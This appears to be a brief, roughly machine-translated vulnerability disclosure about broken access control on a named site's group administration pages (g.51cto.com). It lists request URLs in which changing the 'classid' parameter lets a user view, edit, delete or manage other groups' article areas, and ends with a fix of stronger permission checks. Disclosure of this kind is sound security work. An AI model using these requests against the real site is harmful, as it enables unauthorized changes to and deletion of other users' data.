First/second: new article area/edit login circle background (do not have their own circle to register a first) Access http://g.51cto.com/groupadmin.php? Action = diyclass & job = edit & gid = 3643 & classid = 3136 by modifying the value of "classid", you can view information for modifying other circles. Example: http://g.51cto.com/groupadmin.php? Action = diyclass & job = edit & gid = 3643 & classid = 313 third place: delete Article area http://g.51cto.com/groupadmin.php? Action = diyclass & job = del & gid = 3643 & classid = 3135 "classid" is changed to an existing value to delete it. As this is destructive, I will no longer reproduce the vulnerability. article 4: manage Article area http://g.51cto.com/groupadmin.php? Action = diyclassart & gid = 3643 & classid = 3135 similarly: http://g.51cto.com/groupadmin.php? Action = diyclassart & gid = 3643 & classid = 313
Solution:Strengthen the permission Verification System